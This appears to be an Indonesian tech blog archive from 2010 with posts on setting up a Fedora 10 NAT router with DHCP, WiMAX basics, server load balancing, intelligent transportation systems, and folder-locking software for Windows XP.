Sunday, February 28, 2010

Setting Router di Fedora 10

Router adalah alat yang dapat menghubungkan dua atau lebih jaringan komputer yang berbeda.Router berbeda dengan host karena router bisanya bukan berupa tujuan atau data traffic. Routing dari datagram IP biasanya telah dilakukan dengan software. Jadi fungsi routing dapat dilakukan oleh host yang mempunyai dua networks connection atau lebih.Pada dasarnya router adalah sebuah alat pada jaringan komputer yang bekerja di network layer pada lapisan OSI.
ok kita lanjutkan setting router nya.

mari kita setting main gateway nya (MGW) untuk apa main gateway..lah itu kan supaya bisa konek ke internet bos..oya sebelumnya kita minta ip dulu dari isp langganan kita jangan lupa juga netmask,broadcast dan dns nya. misalnya ip dari isp di kasih

Range : 202.159.121.0/29
IP : 202.159.121.2
Gateway : 202.159.121.1
Netmask : 255.255.255.248
Broadcast : 202.159.121.7
DNS1 : 202.159.0.10
DNS2 : 202.159.0.20

berarti kita mendapatkan ip 5 buah dari 202.159.121.2 - 202.159.121.6

1.Menkonfigurasi IP eth0 (default) dengan perintah:

vi /etc/sysconfig/network-scripts/ifcfg-eth0

[root@syawal all]$ vi /etc/sysconfig/network-scripts/ifcfg-eth0

lalu isi dengan :

DEVICE=eth0
BOOTPROTO=static
IPADDR=202.159.121.2
NETMASK=255.255.255.248
ONBOOT=yes
USERCTL=no

Untuk menyimpan configurasi dengan mengetik � :wq! “

2.Setting dns resolve

[root@syawal all]$ vi /etc/resolv.conf

lalu isi dengan nameserver dari isp kita tadi :

nameserver 202.159.0.10
nameserver 202.159.0.20

lalu simpen dengan menekan :wq

3.Setting ip_forwarding

[root@syawal all]$ vi /etc/sysctl.conf

rubah net.ipv4.ip_forward = 0 menjadi net.ipv4.ip_forward = 1
atau kalau gak ada net.ipv4.ip_forward = 0 tambahin net.ipv4.ip_forward = 1

simpen dengan menekan :wq

4.restart network

[root@syawal all]$ /etc/init.d/network restart
Shutting down interface eth0: [ OK ]
Shutting down loopback interface: [ OK ]
Disabling IPv4 packet forwarding: [ OK ]
Setting network parameters: [ OK ]
Bringing up loopback interface: [ OK ]
Bringing up interface eth0: [ OK ]

[root@syawal all]$#chkconfig –level 2345 network on

5.testing dengan ngeping ke default gateway 202.159.121.1

[root@syawal all]$ ping 202.159.121.1
PING 202.159.121.1 (202.159.121.1) 56(84) bytes of data.
64 bytes from 202.159.121.1: icmp_seq=1 ttl=63 time=0.356 ms
64 bytes from 202.159.121.1: icmp_seq=2 ttl=63 time=0.269 ms
64 bytes from 202.159.121.1: icmp_seq=3 ttl=63 time=0.267 ms
64 bytes from 202.159.121.1: icmp_seq=4 ttl=63 time=0.268 ms

— 202.159.121.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.267/0.290/0.356/0.038 ms

6.testing untuk ngeping google.com untuk ngecek dns nya
kalau muncul :

PING google.com (216.239.39.99) 56(84) bytes of data.

berarti dns kita untuk mgw dah bekerja, tapi kalau muncul :

ping: unknown host google.com

berarti dns yang kita isikan di /etc/resolve.conf masih salah,
silahkan cek lagi ke ISP nya

owalah ini sich sudah beres untuk setting mgw nya
supaya mgw ini bisa sekaligus di gunakan sebagai ns server
oleh client maka harus di install daemon bind atau
daemon nameserver yang lain
ataukalau sudah ada tinggal idupin Bind nya

[root@syawal all]# /etc/init.d/named restart
Stopping named: [ OK ]
Starting named: [ OK ]
[root@syawal all]#chkconfig –level 2345 named on

Setting IP MGW :

[root@syawal all]$ vi /etc/sysconfig/network

lalu isi dengan :

NETWORKING=yes
HOSTNAME=ali
GATEWAY=202.159.121.1
~

sekarang kita set ip untuk cliennya
misalnya ip ke client adalah :

192.168.0.1/24
IP : 192.168.0.1
netmask : 255.255.255.0
broadcast : 192.168.0.255
RANGE IP CLIENT : 192.168.0.2-192.168.0.254

Setting ip untuk eth1 (yang ke client)
1.memberi IP 192.168.0.1 di eth1

[root@syawal all]$ vi /etc/sysconfig/network-scripts/ifcfg-eth1

lalu isi dengan :

DEVICE=eth1
BOOTPROTO=static
IPADDR=192.168.0.1
NETMASK=255.255.255.0
BROADCAST=192.168.0.255
ONBOOT=yes
USERCTL=no

lalu simpen dengan menekan :wq

2.Restart networknya

[root@syawal all]$ /etc/init.d/network restart
Shutting down interface eth0: [ OK ]
Shutting down interface eth1: [ OK ]
Shutting down loopback interface: [ OK ]
Disabling IPv4 packet forwarding: [ OK ]
Setting network parameters: [ OK ]
Bringing up loopback interface: [ OK ]
Bringing up interface eth0: [ OK ]
Bringing up interface eth1: [ OK ]

3.Testing dengan cara ping ip eth1

[root@mgw walle]$ ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=63 time=0.356 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=63 time=0.269 ms
64 bytes from 192.168.0.1: icmp_seq=3 ttl=63 time=0.267 ms
64 bytes from 192.168.0.1: icmp_seq=4 ttl=63 time=0.268 ms

— 192.168.0.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.267/0.290/0.356/0.038 ms

Tinggal Setting IP computer client dengan ketentuan di bawah ini :

IP : 192.168.0.2 - 192.168.0.254
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

misal :

Client01
===============================
IP : 192.168.0.2
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

Client02
===============================
IP : 192.168.0.3
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

dan seterusnya sesuai banyaknya client,yang berubah hanya IP
untuk client windows maka setting IP
di bagian Start Menu/Setting/Control Panel/Network

setelah di setting ip client, maka coba ping ke 192.168.0.1
dari client,kalau berhasil berarti client dan MGW nya sudah tersambung.

Setting MGW supaya client bisa internat dengan menggunakan NAT

1.Matikan iptablesnya

[root@syawal all]$# /etc/init.d/iptables stop
Flushing all chains: [ OK ]
Removing user defined chains: [ OK ]
Resetting built-in chains to the default ACCEPT policy: [ OK ]

2.Tambahkan iptables untuk Source NAt sesuai dengan ip di eth0

[root@syawal all]# /sbin/iptables -t nat -A POSTROUTING
-o eth0 -s 192.168.0.0/24 -j SNAT –to-source 202.159.121.2
[root@syawal all]# /sbin/iptables-save > /etc/sysconfig/iptables
[root@syawal all]# /etc/init.d/iptables restart
Flushing all current rules and user defined chains: [ OK ]
Clearing all current rules and user defined chains: [ OK ]
Applying iptables firewall rules: [ OK ]
[root@syawal all]# iptables-save

disini standar sekali dan gak ada proteksi
untuk mengetest nya kita browser di client lalau buka google.com,
kalau jalan berati kita sudah berhasil )

sekarang kita coba dhcp
untuk menginstall dhcp cukup dengan perintah di bawah ini

1.Instal DHCP dengan perintah

[root@syawal all]# yum -y install dhcp

2. Copy DHCP dari user ke etc dengan perintah :

[root@syawal all]# cp /usr/share/doc/dhcp-3.0.5 /dhcpd.conf.sample /etc/dhcpd.conf

3.Edit settingan DHCP dengan perintah:

[root@syawal all]# vi /etc/dhcpd.conf
ddns-update-style none;
ignore client-updates;

subnet 192.168.1.0 netmask 255.255.255.0 {

# — default gateway
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;

option nis-domain “domain.org�;
option domain-name “domain.org�;
option domain-name-servers 203.84.136.2, 203.84.140.4;

# option time-offset -18000; # Eastern Standard Time
# option ntp-servers 192.168.1.1;
# option netbios-name-servers 192.168.1.1;
# — Selects point-to-point node (default is hybrid). Don’t change this unless
# — you understand Netbios very well
# option netbios-node-type 2;

range dynamic-bootp 192.168.1.128 192.168.1.254;
default-lease-time 21600;
max-lease-time 43200;

Seperti biasa simpan dengan mengetik � :wq!�

4. Jalankan DHCP dengan perintah:

[root@syawal all]# /etc/init.d/dhcpd start

kalo sudah di setting semua nya coba ping 192.168.0.1
nah itu dhcp nya harusnya udah jalan men tapi klo gak jalan juga..coba di restart lagi networknya yah
nah itu ketiga client tadi mari kita buat ip nya automatis jangan statik ya tapi dhcp juga men
buka control panel–pilih network connection –klik lagi local area conektion dan pilih general dan lagi pilih Internet Protocol (TCP/IP) dan pilih Properties dan terakir kali pilih Obtain an Ip addres automatically.klo computer client nya dapat ip dhcp berarti sudah sukses.
yang susah kalu ngambil connec dri modem spedy trus di pancarin ke AP dulu Baru dilanjuting ke Fedora Roter, kalau ada yang tahu mohon Tambahannya, biar sama2 belajar (Masih Newbie).

(BASIS DATA) Mengenal WiMAX (Worldwide Interoperability for Microwave Access)

WiMAX adalah singkatan dari Worldwide Interoperability for Microwave Access, merupakan teknologi akses nirkabel pita lebar (broadband wireless access atau disingkat BWA) yang memiliki kecepatan akses yang tinggi dengan jangkauan yang luas. WiMAX merupakan evolusi dari teknologi BWA sebelumnya dengan fitur-fitur yang lebih menarik. Disamping kecepatan data yang tinggi mampu diberikan, WiMAX juga merupakan teknologi dengan open standar. Dalam arti komunikasi perangkat WiMAX diantara beberapa vendor yang berbeda tetap dapat dilakukan (tidak proprietary). Dengan kecepatan data yang besar (sampai 70 MBps), WiMAX dapat diaplikasikan untuk koneksi broadband ‘last mile’, ataupun backhaul.

Perkembangan Teknologi Wireless

WiMax Standar BWA yang saat ini umum diterima dan secara luas digunakan adalah standar yang dikeluarkan oleh Institute of Electrical and Electronics Engineering (IEEE), seperti standar 802.15 untuk Personal Area Network (PAN), 802.11 untuk jaringan Wireless Fidelity (WiFi), dan 802.16 untuk jaringan Worldwide Interoperability for Microwave Access (WiMAX).

Pada jaringan selular juga telah dikembangkan teknologi yang dapat mengalirkan data yang overlay dengan jaringan suara seperti GPRS, EDGE, WCDMA, dan HSDPA. Masing-masing evolusi pada umumnya mengarah pada kemampuan menyediakan berbagai layanan baru atau mengarah pada layanan yang mampu menyalurkan voice, video dan data secara bersamaan (triple play). Sehingga strategi pengembangan layanan broadband wireless dibedakan menjadi Mobile Network Operator (MNO) dan Broadband Provider (BP).

Spektrum Frekuensi WiMAX

Sebagai teknologi yang berbasis pada frekuensi, kesuksesan WiMAX sangat bergantung pada ketersediaan dan kesesuaian spektrum frekuensi. Sistem wireless mengenal dua jenis band frekuensi yaitu Licensed Band dan Unlicensed Band. Licensed band membutuhkan lisensi atau otoritas dari regulator, yang mana operator yang memperoleh licensed band diberikan hak eksklusif untuk menyelenggarakan layanan dalam suatu area tertentu. Sementara Unlicensed Band yang tidak membutuhkan lisensi dalam penggunaannya memungkinkan setiap orang menggunakan frekuensi secara bebas di semua area.

WiMAX Forum menetapkan 2 band frekuensi utama pada certication profile untuk Fixed WiMAX (band 3.5 GHz dan 5.8 GHz), sementara untuk Mobile WiMAX ditetapkan 4 band frekuensi pada system profile release-1, yaitu band 2.3 GHz, 2.5 GHz, 3.3 GHz dan 3.5 GHz.

Secara umum terdapat beberapa alternatif frekuensi untuk teknologi WiMAX sesuai dengan peta frekuensi dunia. Dari alternatif tersebut band frekuensi 3,5 GHz menjadi frekuensi mayoritas Fixed WiMAX di beberapa negara, terutama untuk negara-negara di Eropa, Canada, Timur-Tengah, Australia dan sebagian Asia. Sementara frekuensi yang mayoritas digunakan untuk Mobile WiMAX adalah 2,5 GHz.

Isu frekuensi Fixed WiMAX di band 3,3 GHz ternyata hanya muncul di negara-negara Asia. Hal ini terkait dengan penggunaan band 3,5 GHz untuk komunikasi satelit, demikian juga dengan di Indonesia. Band 3,5 GHz di Indonesia digunakan oleh satelit Telkom dan PSN untuk memberikan layanan IDR dan broadcast TV. Dengan demikian penggunaan secara bersama antara satelit dan wireless terrestrial (BWA) di frekuensi 3,5 GHz akan menimbulkan potensi interferensi terutama di sisi satelit.

Elemen Perangkat WiMAX

Elemen/ perangkat WiMAX secara umum terdiri dari BS di sisi pusat dan CPE di sisi pelanggan. Namun demikian masih ada perangkat tambahan seperti antena, kabel dan asesoris lainnya.

Base Station (BS)

Merupakan perangkat transceiver (transmitter dan receiver) yang biasanya dipasang satu lokasi (colocated) dengan jaringan Internet Protocol (IP). Dari BS ini akan disambungkan ke beberapa CPE dengan media interface gelombang radio (RF) yang mengikuti standar WiMAX. Komponen BS terdiri dari:

* NPU (networking processing unit card)
* AU (access unit card)up to 6 +1
* PIU (power interface unit) 1+1
* AVU (air ventilation unit)
* PSU (power supply unit) 3+1

Antena

Antena yang dipakai di BS dapat berupa sektor 60°, 90°, atau 120° tergantung dari area yang akan dilayani.

Subscriber Station (SS)

Secara umum Subscriber Station (SS) atau (Customer Premises Equipment) CPE terdiri dari Outdoor Unit (ODU) dan Indoor Unit (IDU), perangkat radionya ada yang terpisah dan ada yang terintegrasi dengan antena.

Manfaat Membangun Jaringan LAN (Local Area Network)

Banyak keuntungan yang didapatkan dari terciptanya standardisasi industri ini. Para operator telekomunikasi dapat menghemat investasi perangkat, karena kemampuan WiMAX dapat melayani pelanggannya dengan area yang lebih luas dan tingkat kompatibilitas lebih tinggi. Selain itu, pasarnya juga lebih meluas karena WiMAX dapat mengisi celah broadband yang selama ini tidak terjangkau oleh teknologi Cable dan DSL (Digital Subscriber Line).

WiMAX salah satu teknologi memudahkan mereka mendapatkan koneksi Internet yang berkualitas dan melakukan aktivitas. Sementara media wireless selama ini sudah terkenal sebagai media yang paling ekonomis dalam mendapatkan koneksi Internet. Area coverage-nya sejauh 50 km maksimal dan kemampuannya menghantarkan data dengan transfer rate yang tinggi dalam jarak jauh, sehingga memberikan kontribusi sangat besar bagi keberadaan wireless MAN dan dapat menutup semua celah broadband yang ada saat ini. Dari segi kondisi saat proses komunikasinya, teknologi WiMAX dapat melayani para subscriber, baik yang berada dalam posisi Line Of Sight (posisi perangkat-perangkat yang ingin berkomunikasi masih berada dalam jarak pandang yang lurus dan bebas dari penghalang apa pun di depannya) dengan BTS maupun yang tidak memungkinkan untuk itu (Non-Line Of Sight). Jadi di mana pun para penggunanya berada, selama masih masuk dalam area coverage sebuah BTS (Base Transceiver Stations), mereka mungkin masih dapat menikmati koneksi yang dihantarkan oleh BTS tersebut.

Selain itu, dapat melayani baik para pengguna dengan antena tetap (fixed wireless) misalnya di gedung-gedung perkantoran, rumah tinggal, toko-toko, dan sebagainya, maupun yang sering berpindah-pindah tempat atau perangkat mobile lainnya. Mereka bisa merasakan nikmatnya ber-Internet broadband lewat media ini. Sementara range spektrum frekuensi yang tergolong lebar, maka para pengguna tetap dapat terkoneksi dengan BTS selama mereka berada dalam range frekuensi operasi dari BTS.

Sistem kerja MAC-nya (Media Access Control) yang ada pada Data Link Layer adalah connection oriented, sehingga memungkinkan penggunanya melakukan komunikasi berbentuk video dan suara. Siapa yang tidak mau, ber-Internet murah, mudah, dan nyaman dengan kualitas broadband tanpa harus repot-repot. Anda tinggal memasang PCI card yang kompatibel dengan standar WiMAX, atau tinggal membeli PCMCIA (Personal Computer Memory Card International Association) yang telah mendukung komunikasi dengan WiMAX. Atau mungkin Anda tinggal membeli antena portabel dengan interface ethernet yang bisa dibawa ke mana-mana untuk mendapatkan koneksi Internet dari BTS untuk fixed wireless.

PENGENALAN SERVER LOAD BALANCING, Fleet Management, GIS, Intelligent Transportation System, IT, ITS

Jaringan komputer adalah sebuah kumpulan komputer, printer dan peralatan lainnya yang terhubung. Informasi dan data bergerak melalui kabel-kabel sehingga memungkinkan pengguna jaringan komputer dapat saling bertukar dokumen dan data, mencetak pada printer yang sama dan bersama sama menggunakan hardware/software yang terhubung dengan jaringan. Tiap komputer, printer atau periferal yang terhubung dengan jaringan disebut node. Sebuah jaringan komputer dapat memiliki dua, puluhan, ribuan atau bahkan jutaan node.

Sebuah jaringan biasanya terdiri dari 2 atau lebih komputer yang saling berhubungan diantara satu dengan yang lain, dan saling berbagi sumber daya misalnya CDROM, Printer, pertukaran file, atau memungkinkan untuk saling berkomunikasi secara elektronik. Komputer yang terhubung tersebut, dimungkinkan berhubungan dengan media kabel, saluran telepon, gelombang radio, satelit, atau sinar infra merah.

Server Load Balancing (SLB) disini diartikan sebagai sebuah proses dan teknologi yang mendistribusikan trafik pada beberapa server dengan menggunakan perangkat-perangkat networking. Perangkat tersebut menerima sebuah trafik dari tempat tertentu kemudian trafik tersebut diarahkan ke beberapa server lainnya. Gambar berikut ini menunjukkan bagaimana terjadinya SLB :

Server Load Balancing berfungsi sebagai berikut :

1. menerima trafik dari sebuah network misalnya web traffic dan mengarahkannya ke site tertentu.
2. melakukan split trafik menjadi individual request dan menentukan server mana yang akan menerima individual request tersebut.
3. memantau server dengan menyakinkan bahwa server tersebut bertanggung jawab terhadap traffik.
4. memberikan redudansi dengan mengaktifkan server lebih dari satu unit melalui mekanisme fail-over.
5. menawarkan distribusi content seperti pembacaan URL, interconnecting cookies, dan XML parsing.

Awal Pemakaian

Internet awalnya digunakan sebagian besar oleh para akademisi dan sangat sedikit digunakan oleh orang umum. Ketika terjadi booming internet di tahun 1995 menjadikan sebuah server tunggal tidak akan mampu mengatasi dan memproses keinginan pengguna setiap harinya apalagi sejak internet digunakan dalam dunia perdagangan dengan e-commerce dan applikasi multimedia lainnya. Disaat seperti inilah orang mulai mencari cara untuk mengatasi redudansi kinerja server terhadap traffik yang terus meningkat.

Perkembangan

Jika sebuah server telah bekerja pada batas limitnya maka seorang administrator biasanya melakukan penambahan RAM atau melakukan upgrading processor untuk mendapatkan hasil yang lebih baik. Namun hal seperti itu tidak dapat terlalu membantu. Ada saatnya walaupun kita telah melakukan setting optimal terhadap hardware dan sistem operasi yang digunakan kegagalan server mesih sering terjadi.

DNS Load Balancing

Sebelum kita mengenal teknologi SLB, seorang server administrator terlebih dahulu harus menerapkan proses Load Balancing yang dikenal dengan DNS round robin. DNS roun robin menggunakan fungsi DNS untuk menggunakan satu IP address digunakan bersama pada sebuah hostname. Setiap entry DNS diketahui sebagai record yang memetakan sebuah hostname (misalnya www.nengnong.net) ke sebuah IP Address misalnya adalah 208.185.43.202. Biasanya hanya satu IP Addresss yang diberikan untuk satu hostname. Dengan ISO DNS server, BIND 8, maka DNS entri untuk www.nengnong.

Dengan DNS round robin maka dimungkinkan multiple IP address digunakna pada sebuah hostname yang dapat digunakan untuk mendistribusikan trafik sehingga tidak terlalu sibuk seperti halnya hanya menggunakan satu IP Address. Singkatnya disini kita bisa melihat tiga IP Address untuk sebuah web server yakni 208.185.43.202, 208.185.43.203, dan 208.185.43.204 yang di sharing dan di gunakan oleh www.nengnong.net. Konfigurasi DNS server untuk ketiga IP Address tersebut adalah seperti berikut :

IN A 202.185.43.203

IN A 202.185.43.204

Kita bisa cek effek dari penggunaan DNS dengan nslookup, seperti berikut :

[n3]# nslookup www.nengnong.net

Server: ns1.nengnong.net

Address: 198.143.25.15

Name: www.syawal all.blogspot

Addresses: 208.185.43.202, 208.185.43.203, 208.185.43.204

Dengan demikian distribusi trafik untuk www.nengnong.net terbagi menjadi tiga

Terlihat bahwa distribusi dengan DNS round robin sederhana, namun menggapa mesti menggunakan SLB? Alasannya adalah DNS round robin masih memiliki keterbatasan, distribusi trafik yang tidak dapat diprediksi, caching isue, dan pengukuran kesalahan yang sulit dilakukan.

DNS 101

DNS berasosiasi dengan IP address dengan sebuah hostname sehingga kita tidak perlu mengingat angka-angka yang rumit. Setiap komputer yang terhubung ke Internet harus memiliki IP Address. Ketika user mengetikan URL sebuah hostname pada Browser, maka sistem operasi akan mengirimkan queri untuk melakukan konfigurasi DNS Server terhadap hostname tersebut. DNS server tersebut biasanya tidak memberikan informasi (kecuali di cached) sehingga domain name server mencari nama domain dengan root server. Root server juga tidak memiliki informasi IP Address tapi mengetahui siapa yang memiliki kemudian memberikan laporan kepada DNS server user. Detail prosesnya dijelaskan seperti berikut :

1. User mengetikan URL ke dalam browser
2. Operating System melakukan DNS request untuk mengkonfigurasi DNS server.
3. DNS server melihat apakah ada IP Address yang di cached. Jika tidak maka melakukan query pada Root Server untuk mencari informasi DNS server yang dimaksudkan.
4. Root server kemudian membalas dengan authoritative DNS Server terhadap request dari hostname.
5. DNS server melakukan query terhadap auhoritative DNS server dan menerima respon.

Caching

Salah satu keterbatasan pada DNS round robin adalah DNS caching. Untuk mengindari DNS Server dari banyaknya request yang sama dan menjaga utilisasi bandtwith maka DNS Server melakukan DNS caching. Selama informasi pada DNS mengalami perubahan yang tidak berarti maka akan berfungsi seperti biasa. Namun jika DNS server memberikan masukan baru pada DNS maka sistem akan mencaching entri tersebut sampai entri tersebut expired.

Distribusi Trafik

Distribusi trafik juga merupakan salah satu masalah pada DNS round robin. DNS round robin akan mendistribusikan trafik pada IP Address yang telah diberikan pada sebuah hostname. Jika ada tiga IP Address yang diberikan maka trafik akan di distribusikan ke masing-masing ketiga IP tersebut. Jika ada empat IP address yang diberikan maka trafik akan didistribusikan pada keempat IP tersebut. Namun permasalahannya distribusi trafik sangat signifikan dan tidak selalu stabil. Gambar berikut menunjukan scenario failure pada DNS berbasis load balancing.

Evolusi

Sangat jelas bahwa SLB digunakan untuk mengatasi masalah redudansi, skalabiliti, dan manajemen yang diinginkan. Web Sites saat ini terus tumbuh semakin banyak. Saat ini downtime adalah asosiasi dengan sebuah ukuran rupiah. Beberapa situs kehilangan jutaan rupiah setiap menitnya hanya karena server mengalami down. SLB dibutuhkan untuk mengatasi hal ini. Load Balancing bekerja dengan trafik yang diarahkan pada situs. Satu URL, satu IP Address, dan load lancing digunakan untuk mendistribusikannya dengan baik. SLB memiliki beberapa keuntungan diantaranya adalah :

Fleksibel

dengan SLB kita dapat menambah atau mengurangi jumlah server pada site kita setiap saat. Keuntungan dari sistem ini adalah perawatan pada mesin dapat dilakukan dengan benar. SLB juga dapat mengarahkan trafik pada cookies, URL parsing, algoritma statik dan dinamis dan masih banyak lagi.

Availability Tinggi

SLB dapat melakukan pengecekan status available sebuah server, mengontrol server yang tidak merespon rotasi dan mengembalikannya pada rotasi sehingga berfungsi kembali. Dilakukan secara otomatis tanpa memerlukan intervensi dari administrator.

Load balancer dimulai dari perangkat berbasis PC, tapi sekarang fungsi loadbalancing juga dapat dilakukan pada switch atau router.

Teknologi Lainnya

SLB bekerja dengan melakukan manipulasi tujuan paket jaringan untuk server. Ada beberapa teknologi lain yang dapat digunakan sama dengan SLB diantaranya adalah sebagai berikut :

Firewall Load Balancing (FWLB)

Firewall Load Balancing (FWLB) dikembangkan untuk mengatasi beberapa keterbatasan pada teknologi Firewall. Sebagian besar Firewall adalah berbasis CPU seperti mesin SPARC atau mesin x86 based. Karena prosesor memiliki keterbatasan, throughput firewall pun menjadi terbatas.Kecepatan prosesor, konfigurasi, dan beberapa metric menjadi factor kinerja firewall. Seperti pada SLB, FWLB memungkinkan implementasi beberaa firewall di sharing dan di load sama halnya seperti SLB. Namun karena trafik yang berbeda maka konfigurasi dan teknologinya pun sedikit berbeda. Konfigurasi umumnya adalah seperti berikut :

Global Server Load Balancing

Global Server Load Balancing (GSLB) juga memiliki konsep yang sama dengan SLB hanya saja digunakan untuk distribusi pada lokasi yang lebih luas. SLB bekerja pada LAN (Local Area Network), sedangkan GSLB bekerja pada Wide Area Network (WAN). Ada beberapa cara untuk mengimplemetasikan GSLB seperti DNS based dan BGP based (Border Gateway Protocol). Berikut ini adalah contoh konfigurasi dasar GSLB :

Clustering

Clustering memberikan yang sama seperti halnya pada SLB yakni memberikan availability yang tinggi dan skalabiliti dengan sedikit perbedaan. Clustering melibatkan software protocol (proprietary dari masing-masing vendor) yang berjalan pada beberapa server dengan tujuan untuk melakukan sharing load (seperti pada gambar dibawah). Cluster berada didepan beberapa server kemudian melakukan manipulasi paket pada network device dan menerima trafik kemudian membaginya pada server lainnya. Ada integrasi yang kuat dengan software server.

tks to referensi: Tony Bourke, Server Load Balancing, O’Rielly.

Instalasi, Networking, Site Survey, WLAN

Intelligent Transportation System (ITS)

Pada tahun 1988, OECD (Oraganitation for Economic Coorporation and Development) di Paris merupakan organisasi pertama yang menyatakan bahwa negara-negara maju setiap tahunnya kehilangan millyaran dolar Amerika dari bidang transportasi hanya karena pengemudi tidak mempunyai cukup informasi yang terkait mengenai navigasi [Krakiwsky, 1993]. IVHS AMERIKA (1992) adalah organisasi pertama yang mengkuantifikasi pernyataan OECD tersebut. Dalam laporannya, IVHS AMERIKA melaporkan bahwa pada tahun 1991 di Amerika Serikat 41.000 meninggal akibat kecelakaan lalu lintas, dan lebih dari 5 juta orang terluka. Disamping itu kemacetan lalu lintas dipersalahkan sebagai faktor penghiang produktifitas kerja yang diestimasi merugikan Amerika Serikat sebesar 100 milyar dillar per tahun. Disamping itu kecelakaan-kecelakaan lalu lintas, yang sebagaiannya terkait dengan kemacetan lalu lintas, mengkontribusikan kerugian lainya yang diestimasi sebesar 70 milyar dollar per tahun. Setelah mempelajari karakterisrik persoalan tersebut, IVHS AMERIKA kemudian menyimpulkan bahwa sistem navigasi IVHS (Intelligent Vehicle Highway systems), sekarang dinamakan ITS (Intelligent Transportation Systems) dapat digunakan untuk menyelesaikan permasalahan diatas. ITS memadukan antara faktor manusia (people), jalan (road), dan kendaraan (vehicles) dengan memanfaatkan stade of the art teknologi informasi.

ITS merupakan sintesa dari beberapa teknologi seperti penentuan posisi, komunikasi, sistem informasi, kontrol dan elektronik. Dalam kaitannya dengan teknologi pendukung ITS, GPS biasanya berperan sebagai teknologi penentuan posisinya dan GIS (Geographic Information System) berperan sebagai teknologi sistem informasinya [Arronoff, 1989; Autenucci et al.,1991]. Sistem navigasi ITS dapat diklasifikasikan dalam empat tipe yaitu : Autonomous ITS, Fleet Management ITS, Advisory ITS dan Inventory ITS.

Sistem Autonomous ITS terdiri dari sistem penentuan posisi dan sistem peta elektronik yang ditempatkan pada kendaraan dan dimaksudkan untuk memberikan kemampuan navigasi yang lebih baik bagi pengemudi kendaraan yang bersangkutan. Sarana ini tidak mempunyai komunikasi dengan sistem luar kendaraan kecuali kalau menggunakan GPS untuk penentuan posisinya dimana dalam hal ini diperlukan antena untuk menerima sinyal GPS.

Fleet Management ITS berfungsi untuk mengelola kendaraan dari pusat pengontrol (dispatch center) melalui hubungan komunikasi. Dalam sistem ini kendaraan-kendaraan yang bersangkutan diperlengkapi dengan sistem penentuan posisi dan umumnya mereka tidak diperlengkapi dengan sistem peta elektronik. Kendaraan-kendaraan tersebut melaporkan posisinya kepusat pengontrol sehingga pusat pengontrol mempunyai kemudahan untuk mengelola pergerakan kendaraan tersebut. Disamping memberikan instruksi-instruksi mengenai pengarahan, pusat pengontrol juga bertanggung jawab memberikan informasi-informasi yang diperlukan oleh pengemudi kendaraan sepeti informasi cuaca dan keadaan lalu lintas.

Untuk Advisory ITS system menggabungkan aspek penentuan posisi dan sistem peta elektronik dari sistem autonomous ITS dengan aspek komunikasi dari arsitektur sistem fleet management ITS, Sistem advisory ITS adalah autonomous dalam artian bahwa sistem ini tidak di kontrol oleh suatu pusat pengontrol (dispatch center), tetapi pada saat yang sama sistem ini merupakan bagian dari armada kendaraan yang mendapat pelayanan dari pusat informasi lalu lintas. Pada beberapa sistem advisory ITS, kendaraan – kendaraan tertentu berdiri sendiri sebagai traffic probes, yang memberikan kendaraan-kendaraan lainnya (yang tidak terdefinisikan oleh pusat informasi lalu lintas) informasi-informasi terbaru tentang kondisi lalu lintas dan cuaca.

Yang terakhir adalah Inventory ITS System. Sistem ini biasanya terdiri atas kendaraan yang berdiri sendiri dan dilengkapi dengan kamera video digital untuk mengumpulkan data (lengkap dengan koordinat dan waktu pengambilan) yang terkait dengan jalan; yang diperlukan antara lain untuk keperluan inventarisasi jalan, pemeliharaan jalan, serta penyelidikan objek-objek pengganggu lalu lintas. Kendaraan – kendaraan yang digunakan juga diperlengkapi dengan alat penentuan posisi, data logger, serta pendisplay data dalam bentuk peta elektronik.


tks to : dennycharter

Saturday, February 27, 2010

Cara clasic XP mengamankan data di kompy kamu ...

Repot memang jika satu komputer digunakan banyak orang. Anda mungkin menyimpan file-file rahasia yang tak ingin orang lain membacanya. Bagaimana mengamankan file dan folder itu dari tangan-tangan jahil?

Jika Anda merasa repot melindunginya secara manual, program-program pelindung file/folder bisa menjadi alternatif pilihan Anda. Program-program tersebut bisa diunduh di Internet. Berikut beberapa software yang bisa Anda gunakan untuk mengamankan file dan folder Anda.

1. Folder Lock
Sistem operasi Windows memang menyediakan fasilitas penyembunyi folder. Sayangnya banyak orang yang sudah mengerti bagaimana membuatnya menjadi tak tersembunyi lagi. Folder Lock mungkin bisa menjadi alternatif pilihan.

Folder Lock merupakan software pengunci folder. Program ini muncul sekitar 2 tahun yang lalu. Fungsinya hampir sama seperti gembok. Folder Lock akan memunculkan kotak dialog untuk mengisi password setiap file yang diklik. Tak hanya mengunci, file yang dilindungi pun akan menjadi tersembunyi. Fasilitas yang ditawarkan juga beragam, mulai dari perlindungan dari virus, mengenkripsi dan mengacak data.

Aplikasi ini berukuran 1,82 MB dan dapat berjalan pada platform Windows 98/ME/NT/2000/XP. Program ini bisa diperoleh melalui situs www.newsoftwares.net/folderlock. Sayangnya program tersebut merupakan shareware yang tidak gratis karena Anda harus mengeluarkan kocek US$35 untuk mendapatkannya.

2. Cryptainer LE 5.0.1
Software ini akan membuatkan Anda kontainer data atau folder yang digunakan untuk menyimpan berbagai ragam data. Anda tinggal memasukkan file-file yang akan dienkripsi ke dalam folder tersebut. Tidak hanya bisa bekerja di PC (komputer), program ini juga bisa digunakan dalam media penyimpanan lain seperti USB Drive, CD ROM, Flash Disk dan lainnya.

Selain berfungsi melindungi data, software ini juga mampu melindungi e-mail. Anda bisa mendapatkan software ini secara cuma-cuma alias gratis melalui situs http://www.cypherix.co.uk/cryptainerle/. Sama seperti Folder Lock, program ini bisa berjalan pada platform Windows 98/ME/NT/2000/XP

3. MySecretFolder
